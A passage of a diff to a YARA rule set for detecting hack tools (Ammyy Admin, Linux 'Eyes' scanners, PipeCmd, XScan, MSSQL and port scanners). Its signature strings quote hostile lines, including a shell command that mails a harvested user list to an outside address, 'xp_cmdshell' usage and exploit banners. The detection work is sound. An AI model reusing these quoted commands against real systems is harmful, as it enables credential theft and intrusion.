+		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+		$s1 = "-ERR Get SMS Users ID Failed" fullword
+		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+		$s3 = "-ERR Post SMS Failed" fullword
+		$s4 = "Current.hlt" fullword
+		$s6 = "Histroy.hlt" fullword
+		$s7 = "-ERR Send SMS Failed" fullword
+		$s12 = "-ERR Change Password <New Password>" fullword
+		$s17 = "+OK Send SMS Succussifully" fullword
+		$s18 = "+OK Set New Password: [%s]" fullword
+		$s19 = "CHANGE PASSWORD" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Vscan : FILE
+rule SIGNATURE_BASE_Ammyy_Admin_AA_V3
 {
 	meta:
-		description = "Chinese Hacktool Set - file Vscan.exe"
+		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d73d9c9-62cd-592f-a44e-0a0456c85a3c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1973-L1990"
+		id = "bb140cb7-9f56-5acb-883e-080dfd3f60d5"
+		date = "2014-12-22"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/gkAg2E"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2794-L2818"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
-		logic_hash = "2bbf0a3fb2b3fc9b646c6f8fc021f65a38e1b64edd74301481051541f8938902"
-		score = 75
+		logic_hash = "6ab1de9f3b58cdb2c03f2d72986772333f8b81c98e6cbfd941f20b2fed1c5ff2"
+		score = 55
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
 
 	strings:
-		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
-		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
-		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
-		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
-		$s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii
+		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+		$x5 = "Please enter password for accessing remote computer" fullword ascii
+		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 2 of them
+		2 of ( $x* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Dos_Iis : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Scanssh
 {
 	meta:
-		description = "Chinese Hacktool Set - file iis.exe"
+		description = "Linux hack tools - file scanssh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1992-L2011"
+		id = "9546d0d8-42af-5b4c-ac93-195d14bfbb5b"
+		date = "2015-01-19"
+		modified = "2025-04-14"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2822-L2847"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
-		logic_hash = "d6852af79eac659f4dfa3019793290e0498739f02a06c5540cd7d2c65b46b960"
+		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+		logic_hash = "cb20c28f1767ce23f60c377943d8a129fa069b1a1407bbaf43370f0ff79ade30"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "comspec" fullword ascii
-		$s2 = "program terming" fullword ascii
-		$s3 = "WinSta0\\Defau" fullword ascii
-		$s4 = "* FROM IIsWebInfo" ascii
-		$s5 = "www.icehack." ascii
-		$s6 = "wmiprvse.exe" fullword ascii
-		$s7 = "Pid: %d" ascii
+		$s0 = "Connection closed by remote host" fullword ascii
+		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+		$s5 = "Server closed connection" fullword ascii
+		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s9 = "Remote host closed connection" fullword ascii
+		$s10 = "%s: line %d: bad command `%s'" fullword ascii
+		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
+		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Iisputscannesr : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2
 {
 	meta:
-		description = "Chinese Hacktool Set - file IISPutScannesr.exe"
+		description = "Linux hack tools - file pscan2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5d358e8-955f-5b96-89e7-eb0b6c4d0af0"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2013-L2027"
+		id = "02d96766-6696-5410-ad48-bd8cb642ac51"
+		date = "2015-01-19"
+		modified = "2025-04-14"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2849-L2867"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
-		logic_hash = "27c190050aabcdff3713b388adb0113ad2334c107a2a7b3d682c209b102cf642"
+		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+		logic_hash = "3686ccbd53a6dcedf9b10d131a1fc76b51b265328ad10f63671b64d4bf57a0b6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "yoda & M.o.D." ascii
-		$s2 = "-> come.to/f2f **************" fullword ascii
+		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+		$s8 = "Invalid IP." fullword ascii
+		$s9 = "# scanning: " fullword ascii
+		$s10 = "Unable to allocate socket." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Unknown_CN_Generate : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_A
 {
 	meta:
-		description = "Chinese Hacktool Set - file Generate.exe"
+		description = "Linux hack tools - file a"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88ad2c71-519f-58b0-87f8-a6f54a54a774"
-		date = "2015-06-13"
-		modified = "2022-01-20"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2029-L2047"
+		id = "2b4f52d4-b438-5040-89c5-aab1df15200e"
+		date = "2015-01-19"
+		modified = "2025-04-14"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2869-L2887"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
-		logic_hash = "a83000880bd71f4ee6507cb448b611cb670a47a4dc47c400930d3a41ca594a5d"
+		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+		logic_hash = "a246eb907fd6525c96c911acde6b513fca68248ef8d4f8fa64039791942950ab"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\TEMP\\" ascii
-		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
-		$s3 = "$530 Please login with USER and PASS." fullword ascii
-		$s4 = "_Shell.exe" fullword ascii
-		$s5 = "ftpcWaitingPassword" fullword ascii
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "mv scan.log bios.txt" fullword ascii
+		$s2 = "rm -rf bios.txt" fullword ascii
+		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
+		$s4 = "././pscan2 $1 22" fullword ascii
+		$s10 = "echo \"#cautam...\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Pc_Rejoice : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Mass
 {
 	meta:
-		description = "Chinese Hacktool Set - file rejoice.exe"
+		description = "Linux hack tools - file mass"
 		author = "Florian Roth (Nextron Systems)"
-		id = "197b5a21-e1ed-5ea8-b7f2-e84684aedc54"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2049-L2067"
+		id = "5da0c474-2dc8-5580-bf5c-d3f464225e4c"
+		date = "2015-01-19"
+		modified = "2025-04-14"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2889-L2906"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
-		logic_hash = "9e22a98b5065a95a7f169fda8d6d4112101bffa11a1407e03ec152db41857206"
+		hash = "2054cb427daaca9e267b252307dad03830475f15"
+		logic_hash = "5bf17d1a8ae78681d2c3cba8511019ddf85e6d7a242900b56848521eef40ffc6"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
-		$s2 = "http://www.xxx.com/xxx.exe" fullword ascii
-		$s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
-		$s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s5 = "ListViewProcessListColumnClick!" fullword ascii
-		$s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+		$s3 = "killall -9 pscan2" fullword ascii
+		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
+		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ms11080_Withcmd : FILE
+rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
+		description = "Linux hack tools - file pscan2.c"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa5002ac-d6e6-543f-8020-43dfae689b3b"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2069-L2087"
+		id = "3950b235-70bc-5afd-add5-38c50055b28b"
+		date = "2015-01-19"
+		modified = "2025-04-14"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2908-L2925"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
-		logic_hash = "cd7167269538a5dd197260682ad777f87e43cc2155acf3ce731d1a065395cf4a"
+		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+		logic_hash = "981514cf0887a1a7cb55fe9ed9dadd48adbf0f033e527b357e90e052a4c2d251"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
-		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii
-		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
-		$s4 = "[>] create porcess error" fullword ascii
-		$s5 = "[>] ms11-080 Exploit" fullword ascii
+		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Othertools_Xiaoa : FILE
+rule SIGNATURE_BASE_CN_Portscan : APT FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xiaoa.exe"
+		description = "CN Port Scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a456d373-2063-5264-8cf4-d0a5918392fc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2089-L2107"
+		id = "fb52a89a-2270-5170-9874-9278a0177454"
+		date = "2013-11-29"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2927-L2941"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6988acb738e78d582e3614f83993628cf92ae26d"
-		logic_hash = "451ed602bd1e9dd7e4020108ea133b60c546965bd77be349d07be42150f80fee"
-		score = 75
+		logic_hash = "e1b745bd321527cee3eb203847d00c9eda4a7b1e498cb8f0ad6b588f87221759"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = "APT, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		confidential = false
 
 	strings:
-		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
-		$s2 = "The shell \"cmd\" success!" fullword ascii
-		$s3 = "Not Windows NT family OS." fullword ascii
-		$s4 = "Unable to get kernel base address." fullword ascii
-		$s5 = "run \"%s\" failed,code: %d" fullword ascii
-		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
+		$s2 = "TCP 12.12.12.12"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5A4D and $s2
 }
-rule SIGNATURE_BASE_Unknown2 : FILE
+rule SIGNATURE_BASE_WMI_Vbs : APT
 {
 	meta:
-		description = "Chinese Hacktool Set - file unknown2.exe"
+		description = "WMI Tool - APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af7ddcbf-1cba-51a9-b435-9a267320f502"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2109-L2128"
+		id = "b367306a-38d8-5f4d-8f09-2bf025831f0a"
+		date = "2013-11-29"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2943-L2957"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
-		logic_hash = "dea499eaa87cc454a31672fb842539779926d50785ef827162fde84bfcdcc54a"
-		score = 75
+		logic_hash = "94163981c1a80838d1bea1b21f713f1d8fbdac8704319d1a145f0b4f6d8ff3f6"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = "APT"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		confidential = false
 
 	strings:
-		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" wide
-		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide
-		$s3 = "http://www.md5.com.cn" fullword wide
-		$s4 = "1.5.exe" fullword wide
-		$s5 = "\\Set.ini" wide
-		$s6 = "OpenFileDialog1" fullword wide
-		$s7 = " (*.txt)|*.txt" fullword wide
+		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hydra_7_3_Hydra : FILE
+rule SIGNATURE_BASE_CN_Toolset__Xscanlib_Xscanlib_Xscanlib
 {
 	meta:
-		description = "Chinese Hacktool Set - file hydra.exe"
+		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "70e9a5bf-ce2d-58ab-8bdc-257e2aa5e917"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2130-L2147"
+		id = "c32415f4-044c-50ef-9c4c-b9327cbcef69"
+		date = "2015-03-30"
+		modified = "2025-04-14"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2959-L2980"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
-		logic_hash = "23194c2df0b8bdedc4fc66c423b0aebb10217de328a194b26560d4cc9a5531e3"
-		score = 75
+		logic_hash = "f7f66f1f3ca05e60ac850fbb94c471f664d2dc8a60c09b18686c9f2937296697"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
+		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
+		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
 
 	strings:
-		$s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
-		$s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
-		$s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
-		$s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
-		$s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
+		$s2 = "PlugGetUdpPort" fullword
+		$s3 = "XScanLib.dll" fullword
+		$s4 = "PlugGetTcpPort" fullword
+		$s11 = "PlugGetVulnNum" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Oraclescan : FILE
+rule SIGNATURE_BASE_CN_Toolset_Ntscan_Pipecmd
 {
 	meta:
-		description = "Chinese Hacktool Set - file OracleScan.exe"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "142c0ed1-0752-54c3-9a4b-68e656c32939"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2149-L2165"
+		id = "056ee42d-23f4-5b03-b240-392bc92b90b0"
+		date = "2015-03-30"
+		modified = "2025-04-14"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2982-L3006"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
-		logic_hash = "b9454f47123c32d6c6b51722aeadac9acc2a6232c259703c36ea00c83d8977e6"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
+		logic_hash = "2dab5a4de2abeff5659aa90fbc82bef359937ca9e45e8805b509baeb16943531"
+		score = 70
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
-		$s2 = "\\Borland\\Delphi\\RTL" ascii
-		$s3 = "USER_NAME" ascii
-		$s4 = "FROMWWHERE" fullword ascii
+		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
+		$s3 = "PipeCmd.exe" fullword wide
+		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
+		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
+		$s9 = "PipeCmdSrv.exe" fullword ascii
+		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
+		$s14 = "PIPECMDSRV" fullword wide
+		$s15 = "PipeCmd Service" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Sqltools : FILE
+rule SIGNATURE_BASE_CN_Toolset_Lscanportss_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQLTools.exe"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bddb7956-abc1-58b6-8a6d-eb482be99f42"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2167-L2186"
+		id = "0a796585-5fc8-5b55-acfc-3fe87308b681"
+		date = "2015-03-30"
+		modified = "2025-04-14"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3008-L3028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
-		logic_hash = "35b84c3445e92d61ca5e638a2eb19128dca2174327c6325436287d8d3f0bb976"
-		score = 75
+		hash = "4631ec57756466072d83d49fbc14105e230631a0"
+		logic_hash = "aeecdbef3fe6d66a209df10b44046783e53ef12f67c6877309cb219db4354733"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "DBN_POST" fullword wide
-		$s2 = "LOADER ERROR" fullword ascii
-		$s3 = "www.1285.net" fullword wide
-		$s4 = "TUPFILEFORM" fullword wide
-		$s5 = "DBN_DELETE" fullword wide
-		$s6 = "DBINSERT" fullword wide
-		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
+		$s1 = "LScanPort.EXE" fullword wide
+		$s3 = "www.honker8.com" fullword wide
+		$s4 = "DefaultPort.lst" fullword ascii
+		$s5 = "Scan over.Used %dms!" fullword ascii
+		$s6 = "www.hf110.com" fullword wide
+		$s15 = "LScanPort Microsoft " fullword wide
+		$s18 = "L-ScanPort2.0 CooFly" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2350KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_HKTL_Portscanner_533_NET_Jun15 : FILE
+rule SIGNATURE_BASE_CN_Toolset_Sig_1433_135_Sqlr
 {
 	meta:
-		description = "Chinese Hacktool Set - file portscanner.exe"
+		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c834203d-6d4d-5242-9b1e-b64fa6560ccd"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		old_rule_name = "portscanner"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2188-L2205"
+		id = "74038975-ef06-53d6-bdcc-02706408b596"
+		date = "2015-03-30"
+		modified = "2025-04-14"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3030-L3047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
-		logic_hash = "446cbc1b8046bfd182e0b1c98fe37c8b8ef98f600f5d80d9de83b45aeaf2b386"
-		score = 75
+		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
+		logic_hash = "14c9d104cfb71a2d3545bfb6274e3a282d4597f38057187d76adaf26fe2718fa"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PortListfNo" fullword ascii
-		$s1 = ".533.net" fullword ascii
-		$s2 = "CRTDLL.DLL" fullword ascii
-		$s3 = "exitfc" fullword ascii
+		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
+		$s11 = ";DATABASE=master" fullword ascii
+		$s12 = "xp_cmdshell '" fullword ascii
+		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
 
 	condition:
